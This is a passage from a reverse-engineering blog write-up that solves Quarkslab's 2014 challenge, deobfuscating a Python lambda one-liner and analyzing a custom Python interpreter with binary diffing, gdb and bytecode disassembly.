❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayDiary of a reverse-engineer

Dissection of Quarkslab's 2014 security challenge

Introduction

As the blog was a bit silent for quite some time, I figured it would be cool to put together a post ; so here it is folks, dig in!

The French company Quarkslab recently released a security challenge to win a free entrance to attend the upcoming HITBSecConf conference in Kuala Lumpur from the 13th of October until the 16th.

The challenge has been written by Serge Guelton, a R&D engineer specialized in compilers/parallel computations. At the time of writing, already eight different people manage to solve the challenge, and one of the ticket seems to have been won by hackedd, so congrats to him!

woot.png
According to the description of the challenge Python is heavily involved, which is a good thing for at least two reasons:

In this post I will describe how I tackled this problem, how I managed to solve it. And to make up for me being slow at solving it I tried to make it fairly detailed.

At first it was supposed to be quite short though, but well..I decided to analyze fully the challenge even if it wasn't needed to find the key unfortunately, so it is a bit longer than expected :-).

Anyway, sit down, make yourself at home and let me pour you a cup of tea before we begin :-).

Finding the URL of the challenge

Very one-liner, much lambdas, such a pain

The first part of the challenge is to retrieve an url hidden in the following Python one-liner:

(lambda g, c, d: (lambda _: (_.__setitem__('$', ''.join([(_['chr'] if ('chr'
in _) else chr)((_['_'] if ('_' in _) else _)) for _['_'] in (_['s'] if ('s'
in _) else s)[::(-1)]])), _)[-1])( (lambda _: (lambda f, _: f(f, _))((lambda
__,_: ((lambda _: __(__, _))((lambda _: (_.__setitem__('i', ((_['i'] if ('i'
in _) else i) + 1)),_)[(-1)])((lambda _: (_.__setitem__('s',((_['s'] if ('s'
in _) else s) + [((_['l'] if ('l' in _) else l)[(_['i'] if ('i' in _) else i
)] ^ (_['c'] if ('c' in _) else c))])), _)[-1])(_))) if (((_['g'] if ('g' in
_) else g) % 4) and ((_['i'] if ('i' in _) else i)< (_['len'] if ('len' in _
) else len)((_['l'] if ('l' in _) else l)))) else _)), _) ) ( (lambda _: (_.
__setitem__('!', []), _.__setitem__('s', _['!']), _)[(-1)] ) ((lambda _: (_.
__setitem__('!', ((_['d'] if ('d' in _) else d) ^ (_['d'] if ('d' in _) else
d))), _.__setitem__('i', _['!']), _)[(-1)])((lambda _: (_.__setitem__('!', [
(_['j'] if ('j' in _) else j) for  _[ 'i'] in (_['zip'] if ('zip' in _) else
zip)((_['l0'] if ('l0' in _) else l0), (_['l1'] if ('l1' in _) else l1)) for
_['j'] in (_['i'] if ('i' in _) else i)]), _.__setitem__('l', _['!']), _)[-1
])((lambda _: (_.__setitem__('!', [1373, 1281, 1288, 1373, 1290, 1294, 1375,
1371,1289, 1281, 1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288,
1375,1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355, 1366, 1372, 1302,
1360, 1368, 1354, 1364, 1370, 1371, 1365, 1362, 1368, 1352, 1374, 1365, 1302
]), _.__setitem__('l1',_['!']), _)[-1])((lambda _: (_.__setitem__('!',[1375,
1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293, 1280, 1368, 1368,1294,
1293, 1368, 1372, 1292, 1290, 1291, 1371, 1375, 1280, 1372, 1281, 1293,1373,
1371, 1354, 1370, 1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303,1368,
1354, 1355, 1356, 1303, 1366, 1371]), _.__setitem__('l0', _['!']), _)[(-1)])
            ({ 'g': g, 'c': c, 'd': d, '$': None})))))))['$'])

I think that was the first time I was seeing obfuscated Python and believe me I did a really strange face when seeing that snippet. But well, with a bit of patience we should manage to get a better understanding of how it is working, let's get to it!

Tidying up the last one..

Before doing that here are things we can directly observe just by looking closely at the snippet:

  • We know this function has three arguments ; we don't know them at this point though
  • The snippet seems to reuse __setitem__ quite a lot ; it may mean two things for us:
  • The only standard Python object I know of with a __setitem__ function is dictionary,
  • The way the snippet looks like, it seems that once we will understand one of those __setitem__ call, we will understand them all
  • The following standard functions are used: chr, len, zip
  • That means manipulation of strings, integers and iterables
  • There are two noticeable operators: mod and xor

With all that information in our sleeve, the first thing I did was to try to clean it up, starting from the last lambda in the snippet. It gives something like:

tab0 = [
    1375, 1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293,
    1280, 1368, 1368, 1294, 1293, 1368, 1372, 1292, 1290, 1291,
    1371, 1375, 1280, 1372, 1281, 1293, 1373, 1371, 1354, 1370,
    1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303, 1368,
    1354, 1355, 1356, 1303, 1366, 1371
]

z = lambda x: (
    x.__setitem__('!', tab0),
    x.__setitem__('l0', x['!']),
    x
)[-1]

That lambda takes a dictionary x, sets two items, generates a tuple with a reference to the dictionary at the end of the tuple ; finally the lambda is going to return that same dictionary. It also uses x['!'] as a temporary variable to then assign its value to x['l0'].

Long story short, it basically takes a dictionary, updates it and returns it to the caller: clever trick to pass that same object across lambdas. We can also see that easily in Python directly:

In [8]: d = {}
In [9]: z(d)
Out[9]:
{'!': [1375,
    ...
    'l0': [1375,
    ...
}

That lambda is even called with a dictionary that will contain, among other things, the three user controlled variable: g, c, d. That dictionary seems to be some kind of storage used to keep track of all the variables that will be used across those lambdas.

# Returns { 'g' : g, 'c', 'd': d, '$':None, '!':tab0, 'l0':tab0}
last_res = (
    (
        lambda x: (
            x.__setitem__('!', tab0),
            x.__setitem__('l0', x['!']),
            x
        )[-1]
    )
    ({ 'g': g, 'c': c, 'd': d, '$': None})
)

..then the one before...

Now if we repeat that same operation with the one before the last lambda, we have the exact same pattern:

tab1 = [
    1373, 1281, 1288, 1373, 1290, 1294, 1375, 1371, 1289, 1281,
    1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288,
    1375, 1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355,
    1366, 1372, 1302, 1360, 1368, 1354, 1364, 1370, 1371, 1365,
    1362, 1368, 1352, 1374, 1365, 1302
]

zz = lambda x: (
    x.__setitem__('!', tab1),
    x.__setitem__('l1', x['!']),
    x
)[-1]

Perfect, now let's repeat the same operations over and over again. At some point, the whole thing becomes crystal clear (sort-of):

# Returns { 
    # 'g':g, 'c':c, 'd':d,
    # '!':[],
    # 's':[],
    # 'l':[j for i in zip(tab0, tab1) for j in i],
    # 'l1':tab1,
    # 'l0':tab0,
    # 'i': 0,
    # 'j': 1302,
    # '$':None
#}
res_after_all_operations = (
    (
    lambda x: (
        x.__setitem__('!', []),
        x.__setitem__('s', x['!']),
        x
    )[-1]
    )
    # ..
    (
    (
        lambda x: (
            x.__setitem__('!', ((x['d'] if ('d' in x) else d) ^ (x['d'] if ('d' in x) else d))),
            x.__setitem__('i', x['!']),
            x
        )[-1]
    )
    # ..
    (
        (
        lambda x: (
            x.__setitem__('!', [(x['j'] if ('j' in x) else j) for x[ 'i'] in (x['zip'] if ('zip' in x) else zip)((x['l0'] if ('l0' in x) else l0), (x['l1'] if ('l1' in x) else l1)) for x['j'] in (x['i'] if ('i' in x) else i)]),
            x.__setitem__('l', x['!']),
            x
        )[-1]
        )
        # Returns { 'g':g, 'c':c, 'd':d, '!':tab1, 'l1':tab1, 'l0':tab0, '$':None}
        (
        (
            lambda x: (
                x.__setitem__('!', tab1),
                x.__setitem__('l1', x['!']),
                x
            )[-1]
        )
        # Return { 'g' : g, 'c', 'd': d, '!':tab0, 'l0':tab0, '$':None }
        (
            (
            lambda x: (
                x.__setitem__('!', tab0),
                x.__setitem__('l0', x['!']),
                x
            )[-1]
            )
            ({ 'g': g, 'c': c, 'd': d, '$': None})
        )
        )
    )
    )
)

Putting it all together

After doing all of that, we know now the types of the three variables the function needs to work properly (and we don't really need more to be honest):

  • g is an integer that will be mod 4
  • if the value is divisible by 4, the function returns nothing ; so we will need to have this variable sets to 1 for example
  • c is another integer that looks like a xor key ; if we look at the snippet, this variable is used to xor each byte of x['l'] (which is the table with tab0 and tab1)
  • this is the interesting parameter
  • d is another integer that we can also ignore: it's only used to set x['i'] to zero by xoring x['d'] by itself.

We don't need anything else really now: no more lambdas, no more pain, no more tears. It is time to write what I call, an educated brute-forcer, to find the correct value of c:

import sys

def main(argc, argv):
    tab0 = [1375, 1368, 1294, 1293, 1373, 1295, 1290, 1373, 1290, 1293, 1280, 1368, 1368,1294, 1293, 1368, 1372, 1292, 1290, 1291, 1371, 1375, 1280, 1372, 1281, 1293,1373, 1371, 1354, 1370, 1356, 1354, 1355, 1370, 1357, 1357, 1302, 1366, 1303,1368, 1354, 1355, 1356, 1303, 1366, 1371]
    tab1 = [1373, 1281, 1288, 1373, 1290, 1294, 1375, 1371,1289, 1281, 1280, 1293, 1289, 1280, 1373, 1294, 1289, 1280, 1372, 1288, 1375,1375, 1289, 1373, 1290, 1281, 1294, 1302, 1372, 1355, 1366, 1372, 1302, 1360, 1368, 1354, 1364, 1370, 1371, 1365, 1362, 1368, 1352, 1374, 1365, 1302]

    func = (
        lambda g, c, d: 
        (
            lambda x: (
                x.__setitem__('$', ''.join([(x['chr'] if ('chr' in x) else chr)((x['_'] if ('_' in x) else x)) for x['_'] in (x['s'] if ('s' in x) else s)[::-1]])),
                x
            )[-1]
        )
        (
            (
                lambda x: 
                    (lambda f, x: f(f, x))
                (
                    (
                        lambda __, x: 
                        (
                            (lambda x: __(__, x))
                            (
                                # i += 1
                                (
                                    lambda x: (
                                        x.__setitem__('i', ((x['i'] if ('i' in x) else i) + 1)),
                                        x
                                    )[-1]
                                )
                                (
                                    # s += [c ^ l[i]]
                                    (
                                        lambda x: (
                                            x.__setitem__('s', (
                                                    (x['s'] if ('s' in x) else s) +
                                                    [((x['l'] if ('l' in x) else l)[(x['i'] if ('i' in x) else i)] ^ (x['c'] if ('c' in x) else c))]
                                                )
                                            ),
                                            x
                                        )[-1]
                                    )
                                    (x)
                                )
                            )
                            # if ((x['g'] % 4) and (x['i'] < len(l))) else x
                            if (((x['g'] if ('g' in x) else g) % 4) and ((x['i'] if ('i' in x) else i)< (x['len'] if ('len' in x) else len)((x['l'] if ('l' in x) else l))))
                            else x
                        )
                    ),
                    x
                )
            )
            # Returns { 'g':g, 'c':c, 'd':d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': 0, 'j': 1302, '!':0, 's':[] }
            (
                (
                    lambda x: (
                        x.__setitem__('!', []),
                        x.__setitem__('s', x['!']),
                        x
                    )[-1]
                )
                # Returns { 'g':g, 'c':c, 'd':d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': 0, 'j': 1302, '!':0}
                (
                    (
                        lambda x: (
                            x.__setitem__('!', ((x['d'] if ('d' in x) else d) ^ (x['d'] if ('d' in x) else d))),
                            x.__setitem__('i', x['!']),
                            x
                        )[-1]
                    )
                    # Returns { 'g' : g, 'c', 'd': d, '!':zip(tab1, tab0), 'l':zip(tab1, tab0), l1':tab1, 'l0':tab0, 'i': (1371, 1302), 'j': 1302}
                    (
                        (
                            lambda x: (
                                x.__setitem__('!', [(x['j'] if ('j' in x) else j) for x[ 'i'] in (x['zip'] if ('zip' in x) else zip)((x['l0'] if ('l0' in x) else l0), (x['l1'] if ('l1' in x) else l1)) for x['j'] in (x['i'] if ('i' in x) else i)]),
                                x.__setitem__('l', x['!']),
                                x
                            )[-1]
                        )
                        # Returns { 'g' : g, 'c', 'd': d, '!':tab1, 'l1':tab1, 'l0':tab0}
                        (
                            (
                                lambda x: (
                                    x.__setitem__('!', tab1),
                                    x.__setitem__('l1', x['!']),
                                    x
                                )[-1]
                            )
                            # Return { 'g' : g, 'c', 'd': d, '!' : tab0, 'l0':tab0}
                            (
                                (
                                    lambda x: (
                                        x.__setitem__('!', tab0),
                                        x.__setitem__('l0', x['!']),
                                        x
                                    )[-1]
                                )
                                ({ 'g': g, 'c': c, 'd': d, '$': None})
                            )
                        )
                    )
                )
            )
        )['$']
    )

    for i in range(0x1000):
        try:
            ret = func(1, i, 0)
            if 'quarks' in ret:
                print ret
        except:
            pass
    return 1

if __name__ == '__main__':
    sys.exit(main(len(sys.argv), sys.argv))

And after running it, we are good to go:

D:\Codes\challenges\ql-python>bf_with_lambdas_cleaned.py
/blog.quarkslab.com/static/resources/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf

A custom ELF64 Python interpreter you shall debug

Recon

All right, here we are: we now have the real challenge. First, let's see what kind of information we get for free:

overclok@wildout:~/chall/ql-py$ file b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs),
for GNU/Linux 2.6.26, not stripped

overclok@wildout:~/chall/ql-py$ ls -lah b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
-rwxrw-r-x 1 overclok overclok 7.9M Sep  8 21:03 b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf

The binary is quite big, not good for us. But on the other hand, the binary isn't stripped so we might find useful debugging information at some point.

overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

That does explain the size of the binary then: we basically have something that looks like a custom Python interpreter. Note that I also remembered reading Building an obfuscated Python interpreter: we need more opcodes on Quarkslab's blog where Serge described how you could tweak the interpreter sources to add / change some opcodes either for optimization or obfuscation purposes.

Finding the interesting bits

The next step is to figure out what part of the binary is interesting, what functions have been modified, and where we find the problem we need to solve to get the flag. My idea for that was to use a binary-diffing tool between an original Python278 interpreter and the one we were given.

To do so I just grabbed Python278's sources and compiled them by myself:

overclok@wildout:~/chall/ql-py$ wget https://www.python.org/ftp/python/2.7.8/Python-2.7.8.tgz && tar xzvf Python-2.7.8.tgz

overclok@wildout:~/chall/ql-py$ tar xzvf Python-2.7.8.tgz

overclok@wildout:~/chall/ql-py$ cd Python-2.7.8/ && ./configure && make

overclok@wildout:~/chall/ql-py/Python-2.7.8$ ls -lah ./python
-rwxrwxr-x 1 overclok overclok 8.0M Sep  5 00:13 ./python

The resulting binary has a similar size, so it should do the job even if I'm not using GCC 4.8.2 and the same compilation/optimization options. To perform the diffing I used IDA Pro and Patchdiff v2.0.10.

---------------------------------------------------
PatchDiff Plugin v2.0.10
Copyright (c) 2010-2011, Nicolas Pouvesle
Copyright (C) 2007-2009, Tenable Network Security, Inc
---------------------------------------------------

Scanning for functions ...
parsing second idb...
parsing first idb...
diffing...
Identical functions:   2750
Matched functions:     176
Unmatched functions 1: 23
Unmatched functions 2: 85
done!

Once the tool has finished its analysis we just have to check the list of unmatched function names (around one hundred of them, so it's pretty quick), and eventually we see that:

initdo_not_run_me.png
That function directly caught my eyes (you can even check it doesn't exist in the Python278 source tree obviously :-)), and it appears this function is just setting up a Python module called do_not_run_me.

initdonotrunme_assembly.png
Let's import it:
overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
iPython 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import do_not_run_me
>>> print do_not_run_me.__doc__
None
>>> dir(do_not_run_me)
['__doc__', '__name__', '__package__', 'run_me']
>>> print do_not_run_me.run_me.__doc__
There are two kinds of people in the world: those who say there is no such thing as infinite recursion, and those who say ``There are two kinds of people in the world: those who say there is no such thing as infinite recursion, and those who say ...
>>> do_not_run_me.run_me('doar-e')
Segmentation fault

All right, we now have something to look at and we are going to do so from a low level point of view because that's what I like ; so don't expect big/magic hacks here :).

If you are not really familiar with Python's VM structures I would advise you to read quickly through this article Deep Dive Into Python’s VM: Story of LOAD_CONST Bug, and you should be all set for the next parts.

do_not_run_me.run_me

The function is quite small, so it should be pretty quick to analyze:

  1. the first part makes sure that we pass a string as an argument when calling run_me,
  2. then a custom marshaled function is loaded, a function is created out of it, and called,
  3. after that it creates another function from the string we pass to the function (which explains the segfault just above),
  4. finally, a last function is created from another hardcoded marshaled string.

First marshaled function

To understand it we have to dump it first, to unmarshal it and to analyze the resulting code object:

overclok@wildout:~/chall/ql-py$ gdb -q /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Reading symbols from /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf...done.
gdb$ set disassembly-flavor intel
gdb$ disass run_me
Dump of assembler code for function run_me:
    0x0000000000513d90 <+0>:     push   rbp
    0x0000000000513d91 <+1>:     mov    rdi,rsi
    0x0000000000513d94 <+4>:     xor    eax,eax
    0x0000000000513d96 <+6>:     mov    esi,0x56c70b
    0x0000000000513d9b <+11>:    push   rbx
    0x0000000000513d9c <+12>:    sub    rsp,0x28
    0x0000000000513da0 <+16>:    lea    rcx,[rsp+0x10]
    0x0000000000513da5 <+21>:    mov    rdx,rsp

    ; Parses the arguments we gave, it expects a string object
    0x0000000000513da8 <+24>:    call   0x4cf430 <PyArg_ParseTuple>
    0x0000000000513dad <+29>:    xor    edx,edx
    0x0000000000513daf <+31>:    test   eax,eax
    0x0000000000513db1 <+33>:    je     0x513e5e <run_me+206>

    0x0000000000513db7 <+39>:    mov    rax,QWORD PTR [rip+0x2d4342]
    0x0000000000513dbe <+46>:    mov    esi,0x91
    0x0000000000513dc3 <+51>:    mov    edi,0x56c940
    0x0000000000513dc8 <+56>:    mov    rax,QWORD PTR [rax+0x10]
    0x0000000000513dcc <+60>:    mov    rbx,QWORD PTR [rax+0x30]

    ; Creates a code object from the marshaled string
    ; PyObject* PyMarshal_ReadObjectFromString(char *string, Py_ssize_t len)
    0x0000000000513dd0 <+64>:    call   0x4dc020 <PyMarshal_ReadObjectFromString> 
    0x0000000000513dd5 <+69>:    mov    rdi,rax
    0x0000000000513dd8 <+72>:    mov    rsi,rbx

    ; Creates a function object from the marshaled string
    0x0000000000513ddb <+75>:    call   0x52c630 <PyFunction_New>
    0x0000000000513de0 <+80>:    xor    edi,edi
[...]
gdb$ r -c 'import do_not_run_me as v; v.run_me("")'
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf -c 'import do_not_run_me as v; v.run_me("")'
[...]

To start, we can set two software breakpoints @0x0000000000513dd0 and @0x0000000000513dd5 to inspect both the marshaled string and the resulting code object.

Just a little reminder though on the Linux/x64 ABI: "The first six integer or pointer arguments are passed in registers RDI, RSI, RDX, RCX, R8, and R9".

gdb$ p /x $rsi
$2 = 0x91

gdb$ x/145bx $rdi
0x56c940 <+00>:  0x63    0x00    0x00    0x00    0x00    0x01    0x00    0x00
0x56c948 <+08>:  0x00    0x02    0x00    0x00    0x00    0x43    0x00    0x00
0x56c950 <+16>:  0x00    0x73    0x14    0x00    0x00    0x00    0x64    0x01
0x56c958 <+24>:  0x00    0x87    0x00    0x00    0x7c    0x00    0x00    0x64
0x56c960 <+32>:  0x01    0x00    0x3c    0x61    0x00    0x00    0x7c    0x00
0x56c968 <+40>:  0x00    0x1b    0x28    0x02    0x00    0x00    0x00    0x4e
0x56c970 <+48>:  0x69    0x01    0x00    0x00    0x00    0x28    0x01    0x00
0x56c978 <+56>:  0x00    0x00    0x74    0x04    0x00    0x00    0x00    0x54
0x56c980 <+64>:  0x72    0x75    0x65    0x28    0x01    0x00    0x00    0x00
0x56c988 <+72>:  0x74    0x0e    0x00    0x00    0x00    0x52    0x6f    0x62
0x56c990 <+80>:  0x65    0x72    0x74    0x5f    0x46    0x6f    0x72    0x73
0x56c998 <+88>:  0x79    0x74    0x68    0x28    0x00    0x00    0x00    0x00
0x56c9a0 <+96>:  0x28    0x00    0x00    0x00    0x00    0x73    0x10    0x00
0x56c9a8 <+104>: 0x00    0x00    0x6f    0x62    0x66    0x75    0x73    0x63
0x56c9b0 <+112>: 0x61    0x74    0x65    0x2f    0x67    0x65    0x6e    0x2e
0x56c9b8 <+120>: 0x70    0x79    0x74    0x03    0x00    0x00    0x00    0x66
0x56c9c0 <+128>: 0x6f    0x6f    0x05    0x00    0x00    0x00    0x73    0x06
0x56c9c8 <+136>: 0x00    0x00    0x00    0x00    0x01    0x06    0x02    0x0a
0x56c9d0 <+144>: 0x01

And obviously you can't use the Python marshal module to load & inspect the resulting object as the author seems to have removed the methods loads and dumps:

overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import marshal
>>> dir(marshal)
['__doc__', '__name__', '__package__', 'version']

We could still try to run the marshaled string in our fresh compiled original Python though:

>>> import marshal
>>> part_1 = marshal.loads('c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x14\x00\x00\x00d\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b(\x02\x00\x00\x00Ni\x01\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00True(\x01\x00\x00\x00t\x0e\x00\x00\x00Robert_Forsyth(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00obfuscate/gen.pyt\x03\x00\x00\x00foo\x05\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x02\n\x01')
>>> part_1.co_code
'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b'
>>> part_1.co_varnames
('Robert_Forsyth',)
>>> part_1.co_names
('True',)

We can also go further by trying to create a function out of this code object, to call it and/or to disassemble it even:

>>> from types import FunctionType
>>> def a():
...     pass
...
>>> f = FunctionType(part_1, a.func_globals)
>>> f()
Traceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "obfuscate/gen.py", line 8, in foo
UnboundLocalError: local variable 'Robert_Forsyth' referenced before assignment
>>> import dis
>>> dis.dis(f)
    6           0 LOAD_CONST               1 (1)
                3 LOAD_CLOSURE             0
Traceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "/home/overclok/chall/ql-py/Python-2.7.8/Lib/dis.py", line 43, in dis
    disassemble(x)
    File "/home/overclok/chall/ql-py/Python-2.7.8/Lib/dis.py", line 107, in disassemble
    print '(' + free[oparg] + ')',
IndexError: tuple index out of range

Introducing dpy.py

All right, as expected this does not work at all: seems like the custom interpreter uses different opcodes which the original virtual CPU doesn't know about. Anyway, let's have a look at this object directly from memory because we like low level things (remember?):

gdb$ p *(PyObject*)$rax
$3 = {ob_refcnt = 0x1, ob_type = 0x7d3da0 <PyCode_Type>}

; Ok it is a code object, let's dump entirely the object now
gdb$ p *(PyCodeObject*)$rax
$4 = {
    ob_refcnt = 0x1,
    ob_type = 0x7d3da0 <PyCode_Type>,
    co_argcount = 0x0, co_nlocals = 0x1, co_stacksize = 0x2, co_flags = 0x43,
    co_code = 0x7ffff7f09df0,
    co_consts = 0x7ffff7ee2908,
    co_names = 0x7ffff7f8e390,
    co_varnames = 0x7ffff7f09ed0,
    co_freevars = 0x7ffff7fa7050, co_cellvars = 0x7ffff7fa7050,
    co_filename = 0x7ffff70a9b58,
    co_name = 0x7ffff7f102b0,
    co_firstlineno = 0x5,
    co_lnotab = 0x7ffff7e59900,
    co_zombieframe = 0x0,
    co_weakreflist = 0x0
}

Perfect, and you can do that for every single field of this structure:

  • to dump the bytecode,
  • the constants used,
  • the variable names,
  • etc.

Yes, this is annoying, very much so. That is exactly why there is dpy, a GDB Python command I wrote to dump Python objects in a much easy way directly from memory:

gdb$ r
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
[...]
>>> a = { 1 : [1,2,3], 'two' : 31337, 3 : (1,'lul', [3,4,5])}
>>> print hex(id(a))
0x7ffff7ef1050
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7ef1050
dict -> {1: [1, 2, 3], 3: (1, 'lul', [3, 4, 5]), 'two': 31337}

I need a disassembler now dad

But let's get back to our second breakpoint now, and see what dpy gives us with the resulting code object:

gdb$ dpy $rax
code -> {'co_code': 'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b',
    'co_consts': (None, 1),
    'co_name': 'foo',
    'co_names': ('True',),
    'co_varnames': ('Robert_Forsyth',)}

Because we know the bytecode used by this interpreter is different than the original one, we have to figure out the equivalent between the instructions and their opcodes:

  1. Either we can reverse-engineer each handler of the virtual CPU,
  2. Either we can create functions in both interpreters, disassemble those (thanks to dpy) and match the equivalent opcodes

I guess we can mix both of them to be more efficient:

Python 2.7.8 (default, Sep  5 2014, 00:13:07)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def assi(x):
...     x = 'hu'
...
>>> def add(x):
...     return x + 31337
...
>>> import dis
>>> dis.dis(assi)
    2           0 LOAD_CONST               1 ('hu')
                3 STORE_FAST               0 (x)
                6 LOAD_CONST               0 (None)
                9 RETURN_VALUE
>>> dis.dis(add)
    2           0 LOAD_FAST                0 (x)
                3 LOAD_CONST               1 (31337)
                6 BINARY_ADD
                7 RETURN_VALUE
>>> assi.func_code.co_code
'd\x01\x00}\x00\x00d\x00\x00S'
>>> add.func_code.co_code
'|\x00\x00d\x01\x00\x17S'

# In the custom interpreter

gdb$ r
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def assi(x):
...     x = 'hu'
...
>>> def add(x):
...     return x + 31337
...
>>> print hex(id(assi))
0x7ffff7f0c578
>>> print hex(id(add))
0x7ffff7f0c5f0
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7f0c578
function -> {'func_code': {'co_code': 'd\x01\x00\x87\x00\x00d\x00\x00\x1b',
                'co_consts': (None, 'hu'),
                'co_name': 'assi',
                'co_names': (),
                'co_varnames': ('x',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'assi'}
gdb$ dpy 0x7ffff7f0c5f0
function -> {'func_code': {'co_code': '\x8f\x00\x00d\x01\x00=\x1b',
                'co_consts': (None, 31337),
                'co_name': 'add',
                'co_names': (),
                'co_varnames': ('x',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'add'}

    # From here we have:
    # 0x64 -> LOAD_CONST
    # 0x87 -> STORE_FAST
    # 0x1b -> RETURN_VALUE
    # 0x8f -> LOAD_FAST
    # 0x3d -> BINARY_ADD

OK I think you got the idea, and if you don't manage to find all of them you can just debug the virtual CPU by putting a software breakpoint @0x4b0960:

=> 0x4b0923 <PyEval_EvalFrameEx+867>:   movzx  eax,BYTE PTR [r13+0x0]

For the interested readers: there is at least one interesting opcode that you wouldn't find in a normal Python interpreter, check what 0xA0 is doing especially when followed by 0x87 :-).

Back to the first marshaled function with all our tooling now

Thanks to our disassembler.py, we can now disassemble easily the first part:

PS D:\Codes\ql-chall-python-2014> python .\disassembler_ql_chall.py
    6           0 LOAD_CONST               1 (1)
                3 STORE_FAST               0 (Robert_Forsyth)

    8           6 LOAD_GLOBAL              0 (True)
                9 LOAD_CONST               1 (1)
                12 INPLACE_ADD
                13 STORE_GLOBAL             0 (True)

    9          16 LOAD_GLOBAL              0 (True)
                19 RETURN_VALUE
================================================================================

It seems the author has been really (too) kind with us: the function is really small and we can rewrite it in Python straightaway:

def part1():
    global True
    Robert_Forsyth = 1
    True += 1

You can also make sure with dpy that the code of part1 is the exact same than the unmarshaled function we dumped earlier.

>>> def part_1():
...  global True
...  Robert_Forsyth = 1
...  True += 1
...
>>> print hex(id(part_1))
0x7ffff7f0f578
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7f0f578
function -> {'func_code': {'co_code': 'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00d\x00\x00\x1b',
                'co_consts': (None, 1),
                'co_name': 'part_1',
                'co_names': ('True',),
                'co_varnames': ('Robert_Forsyth',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'part_1'}

Run my bytecode

The second part is also quite simple according to the following disassembly:

gdb$ disass run_me
Dump of assembler code for function run_me:
[...]
    ; Parses the arguments we gave, it expects a string object
    0x0000000000513da0 <+16>:    lea    rcx,[rsp+0x10]
    0x0000000000513da5 <+21>:    mov    rdx,rsp
    0x0000000000513da8 <+24>:    call   0x4cf430 <PyArg_ParseTuple>
    0x0000000000513dad <+29>:    xor    edx,edx
    0x0000000000513daf <+31>:    test   eax,eax
    0x0000000000513db1 <+33>:    je     0x513e5e <run_me+206>

    0x0000000000513db7 <+39>:    mov    rax,QWORD PTR [rip+0x2d4342]
    0x0000000000513dbe <+46>:    mov    esi,0x91
    0x0000000000513dc3 <+51>:    mov    edi,0x56c940
    0x0000000000513dc8 <+56>:    mov    rax,QWORD PTR [rax+0x10]
    0x0000000000513dcc <+60>:    mov    rbx,QWORD PTR [rax+0x30]

[...]
    ; Part1
[...]

    0x0000000000513df7 <+103>:   mov    rsi,QWORD PTR [rsp+0x10]
    0x0000000000513dfc <+108>:   mov    rdi,QWORD PTR [rsp]
    ; Uses the string passed as argument to run_me as a marshaled object
    ; PyObject* PyMarshal_ReadObjectFromString(char *string, Py_ssize_t len)
